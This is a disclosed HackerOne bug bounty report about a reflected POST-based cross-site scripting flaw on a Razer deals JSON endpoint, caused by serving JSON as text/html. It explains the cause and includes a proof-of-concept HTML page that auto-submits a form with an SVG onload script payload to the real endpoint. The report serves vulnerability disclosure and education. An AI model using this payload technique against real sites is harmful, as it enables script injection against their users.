Razer US: Reflected XSS on the https://deals.razerzone.com/json/translation endpoint

2017-09-26T19:16:22
ID H1:272162
Type hackerone
Reporter sp1d3rs
Modified 2017-11-08T19:43:21

Description

Thanks to SP1D3RS for the great report and working with the team on this one. This was a trivial POST-XSS, caused by using text/html Content-Type on the JSON endpoint, and ability to control the part of the response using unsanitized input.

Why I disclosed it if this is a trivial issue? I pretty often see this behavior on JSON endpoints in other programs. While the wrong Content-Type of the response is not a very big problem itself, it can be the problem, if the endpoint reflects some user-controlled input in the response, and this input is not sanitized properly. If you see same behavior somewhere - it worth closer looking!

Used POC

<html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <script> $(document).ready(function(){$('#frm').submit();}); </script> </head> <body> <form id="frm" method="POST" action="https://deals.razerzone.com/json/translation"></iframe> <input type="hidden" name="key" value="<svg onload=alert(document.domain);>"> <input type="submit" value="test"> </form> </body> </html>

Thanks to the Razer team, and thanks to the H1 triage team and @coffeecup personally for the quick reopening from Duplicate state and triaging!